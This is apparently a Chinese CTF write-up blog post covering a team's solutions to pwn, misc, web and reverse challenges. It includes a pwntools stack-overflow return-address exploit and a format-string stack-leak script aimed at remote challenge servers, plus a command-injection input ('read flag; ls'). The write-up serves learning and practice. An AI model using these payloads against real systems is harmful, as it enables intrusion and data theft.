【Pvvn】XAUTCTF-NewCup-Part1

2024-10-17

notes / Pwn notes

字数统计: 1.3k | 阅读时长≈ 7 分钟

¶写在前面

队伍名：sdfghj
得分：3141
排名：5

¶Pwn

¶TestNc

nc连接

TestNc-1

TestNc-2

¶Calc

赶时间啊先交了后面再补充

exp.py

➜  calc cat exp.py 
from pwn import *
context.log_level = 'debug'
# io = process('./pwn')
io = remote('47.121.201.96', 64902)
elf = ELF('./pwn')
gift = elf.sym['gift'] 
ret = 0x00000000004008e7
payload = b'A' * (0x20 + 8) + p64(ret) + p64(gift)
# 0x00000000004007b6  gift
io.sendline(payload)
io.recv()
io.interactive()

Calc-1

Calc-2

¶危险的格式化字符串

感谢pwn爷爷的耐心教导55555

危险的格式化字符串-1

from pwn import *

i = 0

ip = "47.121.201.96"
port = 61318

# 搞出flag在栈中的偏移量
while True:
    try:
        print(f"{i = }")  # 偏移量
        p = remote(ip, port)  # 远程连接
        
        p.recvuntil(b"What's your name?\n")  # 在这句话之后发送payload
        p.send(f"%{i}$p".encode())  # payload本身
        i += 1

        p.recvuntil(b"Hello ")  # 接收返回的内容(Hello之后的部分)
        result = p.recvuntil(b"\n", drop=True)  
        result = int(result.decode(), 16)  # unhex返回的内容
        print(p64(result))  # 打印获得的部分flag，检查是不是XAUTCTF格式
        p.close()
        if b'XAUTCTF' in p64(result):
            print(result)  # 找到正确的偏移量i了
            p.close()
            break
    except Exception as ex:
        p.close()
        continue
print(f"{i = }")  # 正确偏移量

# 开始捣鼓flag
flag = b''  
for j in range(i-1, i+5):  # 没懂
    try:
        p = remote(ip, port)  # 远程连接

        p.recvuntil(b"What's your name?\n")
        p.send(f"%{j}$p".encode())  # payload
        
        p.recvuntil(b"Hello ")
        result = p.recvuntil(b"\n", drop=True)
        result = int(result.decode(), 16)
        flag += p64(result)
        p.close()
    except:
        p.close()
        continue
print(f"{flag = }")

注意点

1 2	p.recvuntil(b"What's your name?\n") p.send(f"%{j}$p".encode()) # payload

$p
和
$ x
的区别

危险的格式化字符串-注意点-1

¶ez_pwn

ez_pwn-解题结果

read flag; ls
获得flag文件真实名称：f@1111111g
连接远程并输入：read f@1111111g
→（实际上运行的是）cat f@1111111g

ida反编译-read_file函数

关键函数read_file

ida反编译-systemctl函数

ida反编译-main函数

ez_pwn-解题过程

ez_pwn-知识点

pwn爷爷の提醒

¶Misc

¶Where are you？

社会工程学。。。好好玩

XAUTCTF{9-}

不知道几楼的，拉倒

所在楼层5/6，考虑到拍摄角度，继续分析

可以看到对面交大的角度，根据平时经验，教室号应该是小于15，大概率是0几

基本锁定教室号为0几
锁定所在楼层为5层

然后开始一个个试
没记错应该是：XAUTCTF{9-504}

¶学号

求助学弟，使用了盒武器（高端版）

¶Hello CTFer

问一下小七

Hello CTFer

这个东西挺好玩的，下次我也搞一个
PS：I Hate To Hack AI :(

¶Web

¶WEB_Starter

F12看注释

¶Reverse

¶PyRe

  1           0 LOAD_CONST               0 (0)
              2 LOAD_CONST               1 (('flag',))
              4 IMPORT_NAME              0 (flag)
              6 IMPORT_FROM              0 (flag)
              8 STORE_NAME               0 (flag)
             10 POP_TOP

  2          12 LOAD_CONST               0 (0)
             14 LOAD_CONST               2 (None)
             16 IMPORT_NAME              1 (base64)
             18 STORE_NAME               1 (base64)

  4          20 LOAD_NAME                2 (str)
             22 LOAD_NAME                2 (str)
             24 LOAD_NAME                3 (bytes)
             26 LOAD_CONST               3 (('flag', 'key', 'return'))
             28 BUILD_CONST_KEY_MAP      3
             30 LOAD_CONST               4 (<code object chipher at 0x0000022170BC2920, file ".\attachment.py", line 4>)
             32 LOAD_CONST               5 ('chipher')
             34 MAKE_FUNCTION            4 (annotations)
             36 STORE_NAME               4 (chipher)

 11          38 LOAD_NAME                5 (__name__)
             40 LOAD_CONST               6 ('__main__')
             42 COMPARE_OP               2 (==)
             44 POP_JUMP_IF_FALSE       72

 12          46 LOAD_CONST               7 ('XAUTCTF2024')
             48 STORE_NAME               6 (key)

 13          50 LOAD_NAME                4 (chipher)
             52 LOAD_NAME                0 (flag)
             54 LOAD_NAME                6 (key)
             56 CALL_FUNCTION            2
             58 STORE_NAME               7 (crypto)

 14          60 LOAD_NAME                8 (print)
             62 LOAD_NAME                7 (crypto)
             64 LOAD_METHOD              9 (decode)
             66 CALL_METHOD              0
             68 CALL_FUNCTION            1
             70 POP_TOP
        >>   72 LOAD_CONST               2 (None)
             74 RETURN_VALUE

Disassembly of <code object chipher at 0x0000022170BC2920, file ".\attachment.py", line 4>:
  5           0 LOAD_CONST               1 ('')
              2 STORE_FAST               2 (crypto)

  6           4 LOAD_GLOBAL              0 (range)
              6 LOAD_GLOBAL              1 (len)
              8 LOAD_FAST                0 (flag)
             10 CALL_FUNCTION            1
             12 CALL_FUNCTION            1
             14 GET_ITER
        >>   16 FOR_ITER                44 (to 62)
             18 STORE_FAST               3 (i)

  7          20 LOAD_FAST                2 (crypto)
             22 LOAD_GLOBAL              2 (chr)
             24 LOAD_GLOBAL              3 (ord)
             26 LOAD_FAST                0 (flag)
             28 LOAD_FAST                3 (i)
             30 BINARY_SUBSCR
             32 CALL_FUNCTION            1
             34 LOAD_GLOBAL              3 (ord)
             36 LOAD_FAST                1 (key)
             38 LOAD_FAST                3 (i)
             40 LOAD_GLOBAL              1 (len)
             42 LOAD_FAST                1 (key)
             44 CALL_FUNCTION            1
             46 BINARY_MODULO
             48 BINARY_SUBSCR
             50 CALL_FUNCTION            1
             52 BINARY_XOR
             54 CALL_FUNCTION            1
             56 INPLACE_ADD
             58 STORE_FAST               2 (crypto)
             60 JUMP_ABSOLUTE           16

  8     >>   62 LOAD_GLOBAL              4 (base64)
             64 LOAD_METHOD              5 (b64encode)
             66 LOAD_FAST                2 (crypto)
             68 LOAD_METHOD              6 (encode)
             70 CALL_METHOD              0
             72 CALL_METHOD              1
             74 RETURN_VALUE


#OUTPUT: AAAAAAAAAElUC1dqJTZtInkkUwQEGWxwZGZuMCMBUh8COnRmYHIwIwUDUQIl

用爱解题）））
爱说：需要理解给定的字节码，然后逆向推导出原始的 Python 代码，最终解开加密的 flag

import base64

def decrypt(crypto, key):
    crypto = base64.b64decode(crypto).decode()
    flag = ''
    for i in range(len(crypto)):
        flag += chr(ord(crypto[i]) ^ ord(key[i % len(key)]))
    return flag

if __name__ == '__main__':
    key = 'XAUTCTF2024'
    encrypted_flag = 'AAAAAAAAAElUC1dqJTZtInkkUwQEGWxwZGZuMCMBUh8COnRmYHIwIwUDUQIl'
    decrypted_flag = decrypt(encrypted_flag, key)
    print(decrypted_flag)

PyRe-1

¶Re就这？

拖进ida64并按F5

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[32]; // [rsp+20h] [rbp-60h] BYREF
  int v5[31]; // [rsp+40h] [rbp-40h] BYREF
  int i; // [rsp+BCh] [rbp+3Ch]

  _main(argc, argv, envp);
  memset(v5, 0, 0x78ui64);
  v5[0] = 19;
  v5[1] = 10;
  v5[2] = 30;
  v5[3] = 31;
  v5[4] = 8;
  v5[5] = 31;
  v5[6] = 13;
  v5[7] = 48;
  v5[8] = 124;
  v5[9] = 3;
  v5[10] = 122;
  v5[11] = 17;
  v5[12] = 20;
  v5[13] = 122;
  v5[14] = 24;
  v5[15] = 20;
  v5[16] = 120;
  v5[17] = 51;
  v5[18] = 40;
  v5[19] = 124;
  v5[20] = 61;
  v5[21] = 126;
  v5[22] = 2;
  v5[23] = 61;
  v5[24] = 14;
  v5[25] = 20;
  v5[26] = 36;
  v5[27] = 57;
  v5[28] = 54;
  printf("Welcome, I can help you verify your flag:>>");
  scanf("%s", v4);
  for ( i = 0; i <= 28; ++i )
  {
    if ( v4[i] != (v5[i] ^ 0x4B) )
    {
      puts("Sorry, your flag is incorrect!");
      return 0;
    }
  }
  puts("Yes, your flag is correct!");
  return 0;
}

v5 = [
    19, 10, 30, 31, 8, 31, 13, 48, 124, 3, 122, 17, 20, 122, 24, 20, 120, 51, 40, 124, 61, 126, 2, 61, 14, 20, 36, 57, 54
]

key = 0x4B

flag = ''.join(chr(v5[i] ^ key) for i in range(29))

print(flag)

Re就这？-1